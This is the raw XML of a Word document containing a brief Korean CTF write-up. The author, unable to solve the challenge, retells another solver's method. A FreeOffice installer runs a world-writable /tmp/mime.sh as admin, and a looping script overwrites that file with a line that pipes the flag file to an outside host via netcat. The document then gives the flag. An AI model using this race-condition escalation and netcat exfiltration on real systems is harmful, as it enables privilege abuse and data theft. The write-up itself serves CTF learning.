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EAC8E" w14:textId="28E256E6" w:rsidR="00BF4B3B" w:rsidRDefault="00802F22" w:rsidP="00802F22">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 문제 확인</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2C78B2" w14:textId="50A9449B" w:rsidR="00802F22" w:rsidRDefault="00F7089F" w:rsidP="00802F22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F8013E1" wp14:editId="3BC4415E">
            <wp:extent cx="5731510" cy="22694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D09E" w14:textId="77777777" w:rsidR="0020377F" w:rsidRDefault="0020377F" w:rsidP="00802F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB25F4E" w14:textId="53CE968C" w:rsidR="00802F22" w:rsidRDefault="00802F22" w:rsidP="00802F2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37724A3B" w14:textId="5DA87C97" w:rsidR="0020377F" w:rsidRDefault="0020377F" w:rsidP="00802F22">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">무슨 친구 </w:t>
      </w:r>
      <w:r>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 해킹해서 친구가 뭘 하는지 확인하라는 문제였다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0A2B8" w14:textId="0266EB19" w:rsidR="00763D53" w:rsidRDefault="00763D53" w:rsidP="00802F22">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일을 받아 열어서 확인해봤다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E57E5C" w14:textId="45695F4A" w:rsidR="0020377F" w:rsidRDefault="0020377F" w:rsidP="00802F22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BE657B2" wp14:editId="0EBF167E">
            <wp:extent cx="3438525" cy="1724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68EE" w14:textId="2ABB6481" w:rsidR="005B2E16" w:rsidRDefault="005B2E16" w:rsidP="00802F22"/>
    <w:p w14:paraId="720B6E05" w14:textId="2BA007E7" w:rsidR="005B2E16" w:rsidRDefault="005B2E16" w:rsidP="00802F22">
      <w:r>
        <w:t xml:space="preserve">Readme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>텍스트파일을 먼저 열었다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2308A4" w14:textId="4CBF529D" w:rsidR="005B2E16" w:rsidRDefault="005B2E16" w:rsidP="005B2E16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>build.sh: 파일을 다운로드하고 도커 이미지를 구축</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하세요</w:t>
      </w:r>
      <w:r>
        <w:t>. 시간이 좀 걸리는데, 이 시간을 이용해서 출처를 읽어</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>보세요.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0F3BF0" w14:textId="656BA688" w:rsidR="005B2E16" w:rsidRDefault="005B2E16" w:rsidP="005B2E16">
      <w:r w:rsidRPr="005B2E16">
        <w:t>run-env/run-debug.sh</w:t>
      </w:r>
      <w:r>
        <w:t>: ./run-debug.sh exploit.sh를 실행하여 취약점을 개발하</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>세요.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 그래픽 환경을 관찰하려면 "vncviewer 127.0.0.1"을 사용하</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>세요</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BEE4D" w14:textId="2C515076" w:rsidR="005B2E16" w:rsidRDefault="005B2E16" w:rsidP="005B2E16">
      <w:r>
        <w:t>run-env/run.sh: 이 스크립트를 사용하여 프로덕션에서 당신의 공격이 실행될 것</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입니다</w:t>
      </w:r>
      <w:r>
        <w:t>(활용이 있는 디렉토리는 첫 번째 arg로 전달</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>됨</w:t>
      </w:r>
      <w:r>
        <w:t>). 몇 분 후에 죽을 것</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468887D9" w14:textId="1A32BB93" w:rsidR="005B2E16" w:rsidRDefault="005B2E16" w:rsidP="005B2E16">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해석해보면 이런 내용이었다.</w:t>
      </w:r>
      <w:r w:rsidR="00265B3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00265B3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">보니까 가상머신으로 열어야 할 것 같아서 </w:t>
      </w:r>
      <w:r w:rsidR="00053700">
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="00053700">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 실행해서 파일을 </w:t>
      </w:r>
      <w:r w:rsidR="00053700">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>다시 받았다.</w:t>
      </w:r>
      <w:r w:rsidR="00F94E78">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F94E78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그런데 내가 아직 가상머신에 미숙해서 문제를 해결할 수 있는 수준이 아닌 것 같다.</w:t>
      </w:r>
      <w:r w:rsidR="00F94E78">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F94E78">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>다른 분의 라업을 보면</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2752AC47" w14:textId="3805E0D2" w:rsidR="00F94E78" w:rsidRDefault="00F94E78" w:rsidP="005B2E16">
      <w:r>
        <w:t>Run-debug.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548EADB5" w14:textId="7DE571DC" w:rsidR="00F94E78" w:rsidRDefault="00F94E78" w:rsidP="005B2E16">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26E4A4EC" wp14:editId="69DA7C75">
            <wp:extent cx="5731510" cy="13919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118F" w14:textId="65DC5EDB" w:rsidR="00F94E78" w:rsidRDefault="00F94E78" w:rsidP="005B2E16">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이걸로 도커 컨테이너를 실행할 때 파일 시스템을 탐색</w:t>
      </w:r>
      <w:r w:rsidR="008E73BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>할 수 있는데</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487619D6" w14:textId="2DC83B7D" w:rsidR="00F94E78" w:rsidRDefault="00F94E78" w:rsidP="005B2E16">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">컨테이너가 시작되면 </w:t>
      </w:r>
      <w:r w:rsidR="008E73BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="008E73BE">
        <w:t>uest</w:t>
      </w:r>
      <w:r w:rsidR="008E73BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 스크립트가 실행된다.</w:t>
      </w:r>
      <w:r w:rsidR="008E73BE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E73BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(s</w:t>
      </w:r>
      <w:r w:rsidR="008E73BE">
        <w:t>leep 1000</w:t>
      </w:r>
      <w:r w:rsidR="008E73BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>이 실행)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759EF410" w14:textId="330A3FD5" w:rsidR="008E73BE" w:rsidRDefault="008E73BE" w:rsidP="005B2E16">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>관리자는</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E73BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>/home/admin/data/softmaker-freeoffice-2018_980-01_amd64.deb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>를 설치하고 플래그가 포함된 파일을 연다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A964A4C" w14:textId="7BDE21A3" w:rsidR="0060630B" w:rsidRDefault="0060630B" w:rsidP="005B2E16">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">아까 토커 컨테이너를 실행해서 파일 시스템을 탐색할 때 다른 사람이 쓸 수 있는 파일을 찾을 수 있는데 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>logfile /tmp/smsfree.1.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>를 발견할 수 있다고 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD76DC" w14:textId="5CEB193A" w:rsidR="0060630B" w:rsidRDefault="0060630B" w:rsidP="005B2E16">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">여긴 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>su admin -c “sh /tmp/mime.sh”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>를 볼 수 있는데 스트립트가 a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>dmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>으로 실행된다는 걸 알 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="003258C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003258C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">따라서 설치 프로세스가 시작되기 전 파일을 작성하고 관리자 홈에서 </w:t>
      </w:r>
      <w:r w:rsidR="003258C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">flag.prdx </w:t>
      </w:r>
      <w:r w:rsidR="003258C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>파일을 복사하는 명령이 실행될 수 있도록 하면 된다.</w:t>
      </w:r>
      <w:r w:rsidR="00175ADB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00175ADB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>실행의 순서는 아래와 같다고 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D0B37" w14:textId="77777777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>touch /tmp/mime.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62441039" w14:textId="77777777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>chmod 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682F5357" w14:textId="77777777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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D1B60" w14:textId="77777777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>/bin/cat &lt;&lt;EOF &gt;/tmp/mymime.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78302BDB" w14:textId="77777777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>cat /home/admin/data/flag.prdx | nc myserver.de 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0F65AB" w14:textId="77777777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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BC4DBA" w14:textId="77777777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>EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFEB51A" w14:textId="77777777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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876B32A" w14:textId="77777777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>while true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC40A88" w14:textId="77777777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 xml:space="preserve"> do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D4C6B2" w14:textId="77777777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 xml:space="preserve">     cp /tmp/mymime.sh /tmp/mime.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4233AA1A" w14:textId="43C00DD6" w:rsidR="00585C90" w:rsidRDefault="00585C90" w:rsidP="00585C90">
      <w:pPr>
        <w:spacing w:line="180" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DFA029" w14:textId="79F37CA1" w:rsidR="00585C90" w:rsidRDefault="00CD6F93" w:rsidP="00585C90">
      <w:pPr>
        <w:spacing w:line="180" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD6F93">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>DrgnS {W4at_ab0ut_r3spon5ible_di5closur3}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00585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47BEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94CE48B8"/>
    <w:lvl w:ilvl="0" w:tplc="291EC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5A"/>
    <w:rsid w:val="00053700"/>
    <w:rsid w:val="00175ADB"/>
    <w:rsid w:val="0020377F"/>
    <w:rsid w:val="00265B3F"/>
    <w:rsid w:val="003258C0"/>
    <w:rsid w:val="00585C90"/>
    <w:rsid w:val="005B2E16"/>
    <w:rsid w:val="0060630B"/>
    <w:rsid w:val="00763D53"/>
    <w:rsid w:val="00802F22"/>
    <w:rsid w:val="008E73BE"/>
    <w:rsid w:val="00BE095A"/>
    <w:rsid w:val="00BF4B3B"/>
    <w:rsid w:val="00CD6F93"/>
    <w:rsid w:val="00F7089F"/>
    <w:rsid w:val="00F9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D28C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF3F5CEB-CC72-474C-B64D-22A89260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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-30T16:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-30T16:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>